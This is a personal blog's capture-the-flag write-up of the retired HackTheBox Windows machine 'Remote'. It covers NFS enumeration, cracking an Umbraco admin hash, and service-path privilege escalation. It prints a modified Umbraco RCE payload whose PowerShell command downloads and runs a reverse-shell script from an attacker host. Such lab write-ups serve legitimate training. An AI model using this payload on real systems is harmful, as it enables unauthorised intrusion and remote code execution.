Shubham Kumar HomeAboutDonateSubscribeArchivesCategoriesTagsProjectsContact Me
HackTheBox - Remote
|htbmachinesretired|

Summary

Remote,a Windows box created by HackTheBox user mrb3n, was an overall easy difficulty box.The Initial enumeration show that port 80, 111 ,139 and 445. The nmap scan also shows that NFS mount are present. So we mount it and look at the backup of the site and we find credential for web and also version of the web app Umbraco as 7.12.4 which have an RCE on exploitdb and get a shell as low privilege shell and grab user.txt. Enumerating again we see we have All Access to UsoSvc. Exploiting that we get a shell as Administrator.

Enumeration

nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
# Nmap 7.80 scan initiated Sat Mar 21 15:01:27 2020 as: nmap -sC -sV -oN nmap/remote 10.10.10.180
Nmap scan report for 10.10.10.180
Host is up (0.15s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_  SYST: Windows_NT
80/tcp   open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp  open  rpcbind       2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
2049/tcp open  mountd        1-3 (RPC #100005)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -2s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-03-21T19:02:44
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Mar 21 15:03:08 2020 -- 1 IP address (1 host up) scanned in 101.22 seconds

Enumerating the web we see find a login for Umbraco web application

we don’t have any credential so we move to another service. Enumerating smb we don’t find anything interesting. so i started looking in rpc and used

1
showmount -e 10.10.10.180

to list any mount path and we find /site_backup

and mount that using

1
mount 10.10.10.180:/site_backup /mnt/temp

and looking in that we find a smf file and trying to read in smf reader was a failure. So trying strings command to see all readable

and using that we get the user and possible hashes

1
2
3
Administrator admin default en-US b22924d5-57de-468e-9df4-0961cf6aa30d
Administrator admin b8be16afba8c314ad33d812f22a04991b90e2aaa {"hashAlgorithm":"SHA1"} en-US f8512f97-cab1-4a4b-a49f-0a2054c47a1d
admin admin@htb.local b8be16afba8c314ad33d812f22a04991b90e2aaa {"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50

and cracking the hash b8be16afba8c314ad33d812f22a04991b90e2aaa we get the password as baconandcheese

so we have a credential as

1
admin@htb.local:baconandcheese

User

Enumerating more we find the version of the application as 7.12.4 which have an exploit on exploitdb

Reading the exploit we see that it is just starting the calc.exe as the POC on the box so we modify the payload as

1
2
3
4
5
6
7
8
9
10
payload = '<?xml version="1.0"?><xsl:stylesheet version="1.0" \
xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" \
xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">\
<msxsl:script language="C#" implements-prefix="csharp_user">public string xml() \
{ string cmd = "IEX (New-Object Net.WebClient).DownloadString(\'http://10.10.X.X:8000/shell.ps1\')"; System.Diagnostics.Process proc = new System.Diagnostics.Process();\
 proc.StartInfo.FileName = "powershell"; proc.StartInfo.Arguments = cmd;\
 proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; \
 proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } \
 </msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/>\
 </xsl:template> </xsl:stylesheet> ';

and running the payload we get a callback on the port 8000

Note: I used nishang Invoke-TCP to get a reverse shell

using that we get a reverse shell

and we can read User.txt in C:\Users\Public\User.txt as

Privilege Escalation

Enumerating again we find that we have All Access to UsoSvc so we can modify binPath and restart the service to get a shell as Administrator.

so we stop the service and start the service and change the binPath to a payload to get a shell

and we get a shell as Administrator

and we can read root.txt 3ce5075b71b3d1ca6ef9697695d63efe

and we have pwned Remote 💃

Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/remote/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.
writeupretiredhacktheboxeasywindowsnfs-mountumbracousoSvc